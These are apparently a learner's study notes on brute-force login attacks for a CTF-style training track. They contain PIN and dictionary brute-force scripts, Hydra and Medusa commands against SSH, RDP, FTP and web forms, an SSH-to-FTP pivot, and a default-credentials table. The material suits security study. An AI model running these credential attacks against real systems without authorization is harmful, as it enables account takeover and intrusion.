Introduction
Brute force login attacks test authentication systems by systematically trying candidate credentials until a valid combination is found. In real assessments, this is usually a last-resort option after vulnerabilities and misconfigurations are exhausted, but it still delivers results when password hygiene is weak. The sections below combine strategy, scripts, and tooling so you can move from theory to execution quickly.
Brute Force Process and Use Cases
A brute force process begins with identifying the authentication surface, gathering usernames, and selecting the right attack mode. It is most effective when password policies are weak, default credentials exist, or a specific account is the target.
Password Security Factors
Attack success depends heavily on password length, complexity, and uniqueness, because each added character multiplies the keyspace. Hardware can shrink time-to-crack, but strong policies still make brute force impractical.
Brute Force Techniques
Brute force is not a single method, but a family of approaches that differ in how candidates are generated. The most common paths are pure brute force, dictionary-based guessing, and hybrid patterns that mix real words with predictable mutations. Choosing the right technique is the difference between a quick win and a wasted weekend.
Brute Force vs Dictionary vs Hybrid
Pure brute force tries every possible combination for a given character set and length, which guarantees coverage but quickly becomes expensive. Dictionary attacks focus on human behavior by using real words and leaked passwords, which is faster and often more effective against weak policies. Hybrid attacks combine both by adding prefixes or suffixes to dictionary words, which targets predictable patterns like seasons, years, or symbols.
Keyspace estimate:
Possible Combinations = Character Set Size^Password Length
PIN Brute Force Script
A short PIN range is a classic brute force case because the keyspace is small and predictable. The script below iterates every 4-digit PIN and checks the response for success. It is a good baseline for understanding how tooling automates login attempts.
import requests
ip = "127.0.0.1"
port = 1234
for pin in range(10000):
formatted_pin = f"{pin:04d}"
response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")
if response.ok and 'flag' in response.json():
print(f"Correct PIN found: {formatted_pin}")
print(f"Flag: {response.json()['flag']}")
break
Dictionary Attack Script
Dictionary attacks scale quickly because they only test likely passwords, which fits most real-world policies. The script below pulls a small list of common passwords from SecLists and submits each attempt to a login endpoint. This approach is useful when a target is known to reuse weak passwords.
import requests
ip = "127.0.0.1"
port = 1234
passwords = requests.get(
"https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt"
).text.splitlines()
for password in passwords:
response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})
if response.ok and 'flag' in response.json():
print(f"Correct password found: {password}")
print(f"Flag: {response.json()['flag']}")
break
Wordlist Preparation for Policies
Hybrid attacks often require wordlists that already match password policy rules, such as length, uppercase, and digit requirements. Filtering a list before running tools keeps the keyspace realistic and avoids wasting requests.
wget https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/darkweb2017_top-10000.txt
grep -E '^.{8,}$' darkweb2017-top10000.txt > darkweb2017-minlength.txt
grep -E '[A-Z]' darkweb2017-minlength.txt > darkweb2017-uppercase.txt
grep -E '[a-z]' darkweb2017-uppercase.txt > darkweb2017-lowercase.txt
grep -E '[0-9]' darkweb2017-lowercase.txt > darkweb2017-number.txt
Hydra in Practice
Hydra is widely used because it supports many protocols and scales well with parallel tasks. Correct parameters and targeted wordlists drive results.
Core Syntax and Services
Hydra follows a consistent syntax across services, which makes it easy to switch between targets once you learn the flags. You specify users with -l or -L, passwords with -p or -P, and the service target with service://host, then tune tasks and ports as needed.
HTTP Basic and Form Examples
HTTP basic auth is a quick win when credentials are weak, and Hydra can target it with http-get or http-post-form. Forms require you to map field names and define success or failure strings. Start with a simple run and then refine the response conditions if you get false positives.
hydra -L usernames.txt -P passwords.txt www.example.com http-get
hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
Advanced Hydra Usage
Hydra can handle constrained keyspaces or known username formats, which is useful for RDP or tightly scoped targets. This approach fits cases where you know length and allowed characters but not the password itself.
hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
Medusa in Practice
Medusa is efficient for large-scale brute force because it handles threaded login attempts well and supports a wide set of modules. It is less flexible than Hydra for complex web forms, but it is strong for SSH, FTP, and HTTP basic auth.
Core Syntax and Modules
Medusa uses -h or -H for targets, -u or -U for usernames, and -p or -P for passwords, plus -M to select the module. It also supports -t for tasks and -f to stop on success. The modules map directly to protocols like SSH, FTP, and HTTP, so you can switch services without changing the core structure.
SSH and HTTP Basic Examples
A direct SSH attack is a common starting point when you have a known username and a short password list. For HTTP basic auth, Medusa can target a list of hosts in parallel, which is useful for internal scans. The examples below mirror typical engagement workflows.
medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh | grep "ACCOUNT FOUND"
medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET | grep "ACCOUNT FOUND"
Empty and Default Password Tests
Checking for empty or default passwords is fast and often successful in environments with poor hardening. Medusa supports this with -e ns, which tests null passwords and passwords that match the username. Use it early to avoid wasting time on larger keyspaces.
medusa -h 10.0.0.5 -U usernames.txt -e ns -M service_name | grep "ACCOUNT FOUND"
SSH to FTP Pivot Example
Credential reuse across services is common, so a successful SSH brute force can lead to FTP access on the same host. The flow below shows a practical pivot: crack SSH, enumerate services, then reuse a password list against FTP. This example illustrates how brute force results become a broader foothold.
medusa -h IP -n PORT -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
ssh sshuser@<IP> -p PORT
netstat -tulpn | grep LISTEN
nmap localhost
medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5 | grep "ACCOUNT FOUND"
ftp ftp://ftpuser:<FTPUSER_PASSWORD>@localhost
get flag.txt
cat flag.txt
Web Form Targeting
Web login forms require careful inspection because a small mismatch in field names or response logic will break your attack. Once you identify the action, parameters, and success or failure response, you can build a reliable http-post-form string for Hydra.
Inspecting Forms and Building Params
Use browser developer tools to inspect the HTML and identify name attributes for username and password fields. Then submit a test login and inspect the POST request in the network tab to confirm the exact parameter order. This gives you the path:params:condition string that Hydra expects.
Example parameter string:
/:username=^USER^&password=^PASS^:F=Invalid credentials
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 192.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
Success and Failure Conditions
Hydra detects success by matching response content or status codes, so you must define S= or F= properly. Failure strings such as “Invalid credentials” are usually easier to match, while success can be a redirect like 302 or a keyword like “Dashboard”. Use -f to stop after the first success when you only need one credential pair.
hydra -L users.txt -P passwords.txt 192.168.1.100 http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
hydra -L users.txt -P passwords.txt -f 192.168.1.100 http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
Credential Sources and Defaults
Credential sourcing is the difference between fast wins and slow failures. Default passwords and common usernames are still widespread, especially in network gear and embedded devices. Use curated lists to test likely pairs before you expand the keyspace.
Default Credentials Risks
Default credentials are high-impact because they often provide administrative access with no effort. Attackers maintain lists of these pairs, and many devices still ship with the same defaults. The table below shows common examples you can test early.
| Device or Vendor | Default User | Default Password | Device Type |
|---|---|---|---|
| Linksys Router | admin | admin | Wireless router |
| Netgear Router | admin | password | Wireless router |
| Cisco Router | cisco | cisco | Network router |
| Ubiquiti UniFi AP | ubnt | ubnt | Wireless AP |
| Hikvision DVR | admin | 12345 | DVR |
| Axis IP Camera | root | pass | IP camera |
Common Usernames and Lists
Many environments reuse the same usernames across services, so common lists accelerate your first pass. Use these lists with Hydra or Medusa when you have no prior intelligence. The block below includes frequent defaults and a reminder to pull curated lists from SecLists.
Common usernames:
root
admin
test
guest
info
user
administrator
oracle
ftp
vagrant
Useful lists:
- https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt
Custom Wordlists
Custom wordlists turn reconnaissance data into practical attack inputs. They are especially useful when users follow predictable naming patterns or choose passwords based on personal details. Two tools that help here are Username Anarchy and CUPP.
Username Anarchy
Username Anarchy generates realistic username variants from names and common patterns. It handles initials, separators, and simple substitutions, which is often enough to cover how organizations format usernames. Use its output directly in Hydra or Medusa.
./username-anarchy Jane Smith > jane_smith_usernames.txt
CUPP
CUPP builds password lists from OSINT and personal details, which makes it effective when users incorporate hobbies, dates, or local terms. The tool asks interactive questions and then generates permutations based on the answers you provide. The more accurate your input, the higher your success rate.
python3 cupp.py -i
Reference
This article is based on my personal study notes from the Information Security Foundations track.
Full repository: https://github.com/lameiro0x/pentesting-path-htb